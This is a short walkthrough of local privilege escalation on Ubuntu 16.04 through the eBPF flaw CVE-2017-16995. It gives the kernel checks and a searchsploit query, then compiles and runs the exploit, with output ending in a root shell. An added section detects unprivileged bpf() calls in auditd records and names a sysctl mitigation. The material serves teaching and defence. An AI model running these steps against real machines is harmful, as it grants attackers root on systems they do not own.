First, we check the kernel version and architecture:

joe@ubuntu-privesc:~$ cat /etc/issue
Ubuntu 16.04.4 LTS \n \l

uname -r

arch

Then we search for an exploit matching this Linux kernel version, for example:

searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8"

We simply need to transfer it to the victim machine, compile it and run it:

joe@ubuntu-privesc:~$ **gcc cve-2017-16995.c -o cve-2017-16995**

joe@ubuntu-privesc:~$ ./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88007bd1f100
[*] Leaking sock struct from ffff880079bd9c00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880075c11e40
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff880075c11e40
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),1001(joe)
#
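
The run above creates a BPF map and attaches a BPF program as an unprivileged user (uid 1001), so bpf(2) calls from non-root accounts are a useful detection signal. The following is an added example, not part of the original write-up: it filters auditd SYSCALL records for them. The audit rule, the key name bpf_unpriv and the sample records are assumptions constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: flag bpf(2) syscalls made by non-root users in auditd records.
# Assumed audit rule (not from the page):
#   -a always,exit -F arch=b64 -S bpf -k bpf_unpriv
# On x86_64 (arch=c000003e) the bpf syscall number is 321.

# Constructed sample SYSCALL records, shortened to the fields used below.
SAMPLE_AUDIT='type=SYSCALL msg=audit(1522000001.101:812): arch=c000003e syscall=321 success=yes exit=3 ppid=1480 pid=1502 auid=1001 uid=1001 gid=1001 euid=1001 comm="cve-2017-16995" exe="/home/joe/cve-2017-16995" key="bpf_unpriv"
type=SYSCALL msg=audit(1522000002.220:813): arch=c000003e syscall=321 success=yes exit=4 ppid=1 pid=640 auid=4294967295 uid=0 gid=0 euid=0 comm="systemd" exe="/lib/systemd/systemd" key="bpf_unpriv"
type=SYSCALL msg=audit(1522000003.330:814): arch=c000003e syscall=59 success=yes exit=0 ppid=1480 pid=1510 auid=1001 uid=1001 gid=1001 euid=1001 comm="ls" exe="/bin/ls" key="exec"'

# Reads audit records on stdin and prints one line per bpf() call whose
# uid is not 0. Paths containing spaces are not handled in this sketch.
flag_unpriv_bpf() {
  awk '
    $1 == "type=SYSCALL" {
      split("", f)                      # reset the key/value map
      for (i = 2; i <= NF; i++) {
        p = index($i, "=")
        if (p) f[substr($i, 1, p - 1)] = substr($i, p + 1)
      }
      if (f["arch"] == "c000003e" && f["syscall"] == "321" && f["uid"] != "0") {
        gsub(/"/, "", f["exe"])         # strip the quotes auditd adds
        print "uid=" f["uid"] " pid=" f["pid"] " exe=" f["exe"]
      }
    }'
}

# Demonstration on the constructed records.
printf '%s\n' "$SAMPLE_AUDIT" | flag_unpriv_bpf
```

On hosts where no unprivileged workload needs BPF, setting the sysctl kernel.unprivileged_bpf_disabled=1 blocks this syscall for non-root users altogether.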